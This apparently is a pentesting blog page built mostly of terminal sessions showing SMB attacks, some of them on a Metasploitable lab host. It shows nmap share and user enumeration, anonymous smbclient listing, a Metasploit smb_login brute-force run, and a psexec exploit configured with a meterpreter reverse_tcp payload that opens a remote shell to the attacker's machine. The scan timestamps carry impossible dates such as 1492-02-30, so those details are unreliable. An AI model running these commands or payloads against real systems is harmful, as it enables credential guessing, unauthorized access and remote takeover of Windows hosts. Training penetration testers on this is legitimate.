https://myexploit.wordpress.com/myexploit2600_security_conference_talks/
For the near future I will only be releasing new blogs on this site https://1337red.wordpress.com/myexploit will continue but please vist 1337red for SE, Redteaming and advanced pentesting techniques.
SE remote to internal Pentesting how-to capture the domain admin https://myexploit.wordpress.com/remote-social-engineering-the-da-trilogy/
root@bt:~# nmap --script smb-enum-shares.nse -p445 IP-AddressStarting Nmap 5.61TEST4 ( http://nmap.org ) at 1478-02-12 09:11 BST
Nmap scan report for IP-Address
Host is up (0.00092s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 01:02:03:04:05:06 (Micky Systems)
Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access:
| Current user (‘guest’) access:
| C$
| Anonymous access:
| Current user (‘guest’) access:
| IPC$
| Anonymous access: READ
| Current user (‘guest’) access: READ
| Printer
| Anonymous access:
| Current user (‘guest’) access: READ
| SharedDocs
| Anonymous access:
| Current user (‘guest’) access: READ/WRITE
| Test
| Anonymous access:
| Current user (‘guest’) access: READ
| print$
| Anonymous access:
|_ Current user (‘guest’) access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.52 seconds
——————————————————
root@bt:~# nmap -sU -sS –script smb-enum-shares.nse -p U:137,T:139 IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1478-02-12 09:11 BST
Nmap scan report for IP-Address
Host is up (0.00043s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
137/udp open netbios-ns
MAC Address: 01:02:03:04:05:06 (Micky Systems)
Host script results:
| smb-enum-shares:
| ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
| ADMIN$
| Anonymous access:
| C$
| Anonymous access:
| IPC$
|_ Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
——————————————————
Manuly testing Anonymous smb access from backtrack 5r1
root@bt:~# /usr/bin/smbclient -L IP-Address
Enter root’s password: (Add pass if you know or just Press enter)
Domain=[TEST] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
Sharename Type Comment
——— —- ——-
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
SharedDocs Disk
Test Disk
ADMIN$ Disk Remote Admin
C$ Disk Default share
Printer Printer Microsoft XPS Document Writer
session request to IP-Address failed (Called name not present)
session request to 10 failed (Called name not present)
Domain=[TEST] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]
Server Comment
——— ——-
Workgroup Master
——— ——-
——————————————————
msf > use scanner/smb/smb_login
msf auxiliary(smb_login) > set rhosts IP-Address
msf auxiliary(smb_login) > set SMBUser admin
msf auxiliary(smb_login) > set SMBPass password
msf auxiliary(smb_login) > run
[*] IP-Address:445 SMB – Starting SMB login bruteforce
[-]IP-Address – This system allows guest sessions with any credentials, these instances will not be reported.
[*]IP-Address – GUEST LOGIN (Windows 5.1) admin :
[*]IP-Address – GUEST LOGIN (Windows 5.1) admin : admin
[*]IP-Address- GUEST LOGIN (Windows 5.1) admin : password
[*]IP-Address – GUEST LOGIN (Windows 5.1) administrator :
[*]IP-Address – GUEST LOGIN (Windows 5.1) administrator : administrator
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
NOTE
Seeing GUEST LOGIN (Windows 5.1) admin : password = none domain as GUEST is used
If you see – SUCCESSFUL LOGIN (Windows 5.1) ‘username’ : ‘password’ (with a username and a password) = domain and you can go on to try and exploit.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost remote-IP-Address
msf exploit(psexec) > set smbuser username
msf exploit(psexec) > set smbpass password
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost local-IP-Address
msf exploit(psexec) > exploit
——————————————————
smb_enumusers metasploit
The smb_enumusers scanner will connect to each system via the SMB RPC service and enumerate the users on the systemmsf > use auxiliary/scanner/smb/smb_enumusers
msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts IP-Address
msf auxiliary(smb_enumusers) > run
[*] IP-Address METASPLOITABLE [ games, nobody, bind, proxy, syslog, user, www-data, root, news, postgres, bin, mail, distccd, proftpd, dhcp, daemon, sshd, man, lp, mysql, gnats, libuuid, backup, msfadmin, telnetd, sys, klog, postfix, service, list, irc, ftp, tomcat55, sync, uucp ] ( LockoutTries=0 PasswordMin=5 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
———————————————–
smb_enumusers nmap
root@bt:~# nmap –script smb-enum-users.nse -p 445 IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 11:13 BST
Nmap scan report for IP-Address
Host is up (0.00051s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:EB:18:CC (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
| METASPLOITABLE\backup (RID: 1068)
| Full name: backup
| Flags: Account disabled, Normal user account
| METASPLOITABLE\bin (RID: 1004)
| Full name: bin
| Flags: Account disabled, Normal user account
| METASPLOITABLE\bind (RID: 1210)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\daemon (RID: 1002)
| Full name: daemon
| Flags: Account disabled, Normal user account
| METASPLOITABLE\dhcp (RID: 1202)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\distccd (RID: 1222)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\ftp (RID: 1214)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\games (RID: 1010)
| Full name: games
| Flags: Account disabled, Normal user account
| METASPLOITABLE\gnats (RID: 1082)
| Full name: Gnats Bug-Reporting System (admin)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\irc (RID: 1078)
| Full name: ircd
| Flags: Account disabled, Normal user account
| METASPLOITABLE\klog (RID: 1206)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\libuuid (RID: 1200)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\list (RID: 1076)
| Full name: Mailing List Manager
| Flags: Account disabled, Normal user account
| METASPLOITABLE\lp (RID: 1014)
| Full name: lp
| Flags: Account disabled, Normal user account
| METASPLOITABLE\mail (RID: 1016)
| Full name: mail
| Flags: Account disabled, Normal user account
| METASPLOITABLE\man (RID: 1012)
| Full name: man
| Flags: Account disabled, Normal user account
| METASPLOITABLE\msfadmin (RID: 3000)
| Full name: msfadmin,,,
| Flags: Normal user account
| METASPLOITABLE\mysql (RID: 1218)
| Full name: MySQL Server,,,
| Flags: Account disabled, Normal user account
| METASPLOITABLE\news (RID: 1018)
| Full name: news
| Flags: Account disabled, Normal user account
| METASPLOITABLE\nobody (RID: 501)
| Full name: nobody
| Flags: Account disabled, Normal user account
| METASPLOITABLE\postfix (RID: 1212)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\postgres (RID: 1216)
| Full name: PostgreSQL administrator,,,
| Flags: Account disabled, Normal user account
| METASPLOITABLE\proftpd (RID: 1226)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\proxy (RID: 1026)
| Full name: proxy
| Flags: Account disabled, Normal user account
| METASPLOITABLE\root (RID: 1000)
| Full name: root
| Flags: Account disabled, Normal user account
| METASPLOITABLE\service (RID: 3004)
| Full name: ,,,
| Flags: Account disabled, Normal user account
| METASPLOITABLE\sshd (RID: 1208)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\sync (RID: 1008)
| Full name: sync
| Flags: Account disabled, Normal user account
| METASPLOITABLE\sys (RID: 1006)
| Full name: sys
| Flags: Account disabled, Normal user account
| METASPLOITABLE\syslog (RID: 1204)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\telnetd (RID: 1224)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\tomcat55 (RID: 1220)
| Flags: Account disabled, Normal user account
| METASPLOITABLE\user (RID: 3002)
| Full name: just a user,111,,
| Flags: Normal user account
| METASPLOITABLE\uucp (RID: 1020)
| Full name: uucp
| Flags: Account disabled, Normal user account
| METASPLOITABLE\www-data (RID: 1066)
| Full name: www-data
|_ Flags: Account disabled, Normal user account
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
———————————————–
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(smb_enumshares) > set rhosts IP-Address
msf auxiliary(smb_enumshares) > run
[*] IP-Address:139 print$ – Printer Drivers (DISK), tmp – oh noes! (DISK), opt – (DISK), IPC$ – IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC), ADMIN$ – IPC Service (metasploitable server (Samba 3.0.20-Debian)) (IPC)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
———————————————–
root@bt:~# nmap –script smb-enum-shares.nse -p445 IP-Address
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 11:16 BST
Nmap scan report for IP-Address
Host is up (0.00038s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:EB:18:CC (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
———————————————–
msf > use auxiliary/scanner/smb/smb2
msf auxiliary(smb2) > set rhosts IP-Address
msf auxiliary(smb2) > set THREADS 16
msf auxiliary(smb2) > run
———————————————–
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set rhosts IP-Address
rhosts => IP-Address
msf auxiliary(smb_version) > run
[*] IP-Address:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
myexploit 